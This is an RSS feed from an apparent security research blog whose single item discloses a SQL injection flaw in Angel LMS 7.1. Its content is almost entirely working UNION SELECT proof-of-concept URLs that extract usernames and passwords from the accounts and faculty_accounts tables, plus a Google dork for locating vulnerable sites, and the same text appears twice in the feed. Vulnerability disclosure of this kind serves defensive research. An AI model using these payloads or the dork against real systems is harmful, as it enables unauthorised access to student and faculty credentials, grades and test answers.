<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SourceSec Security Research &#187; Web exploit</title>
	<atom:link href="http://www.sourcesec.com/tag/web-exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sourcesec.com</link>
	<description>Security research and vulnerability assesment</description>
	<lastBuildDate>Tue, 19 Jan 2010 05:15:53 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Angel LMS 7.1 SQL Injection Vulnerability</title>
		<link>http://www.sourcesec.com/2008/11/03/angel-lms-71-sql-injection-vulnerability/</link>
		<comments>http://www.sourcesec.com/2008/11/03/angel-lms-71-sql-injection-vulnerability/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 21:29:22 +0000</pubDate>
		<dc:creator>craig</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Web exploit]]></category>

		<guid isPermaLink="false">http://www.sourcesec.com/?p=8</guid>
		<description><![CDATA[Angel LMS 7.1 contains a SQL injection vulnerability in the /section/default.asp page that grants an un-authenticated users access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers (you basically have access to everything).
Exploit POC
/section/default.asp?id=&#8217;+union+select+top+1+username+from+faculty_accounts&#8211;&#8221;
/section/default.asp?id=&#8217;+union+select+top+1+username+from+accounts&#8211;&#8221;
/section/default.asp?id=&#8217;+union+select+top+1+password+from+accounts&#8211;&#8221;
Google Dork
intext:&#8221;2006 angel learning, inc&#8221; -pdf
Credits
Vulnerability discovered by Craig Heffner, originally posted [...]]]></description>
			<content:encoded><![CDATA[<p>Angel LMS 7.1 contains a SQL injection vulnerability in the /section/default.asp page that grants an un-authenticated users access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers (you basically have access to everything).</p>
<p><strong>Exploit POC</strong><br />
/section/default.asp?id=&#8217;+union+select+top+1+username+from+faculty_accounts&#8211;&#8221;<br />
/section/default.asp?id=&#8217;+union+select+top+1+username+from+accounts&#8211;&#8221;<br />
/section/default.asp?id=&#8217;+union+select+top+1+password+from+accounts&#8211;&#8221;</p>
<p><strong>Google Dork</strong><br />
intext:&#8221;2006 angel learning, inc&#8221; -pdf</p>
<p><strong>Credits</strong><br />
Vulnerability discovered by Craig Heffner, originally posted on <a href="http://milw0rm.com/exploits/3390">milw0rm</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sourcesec.com/2008/11/03/angel-lms-71-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

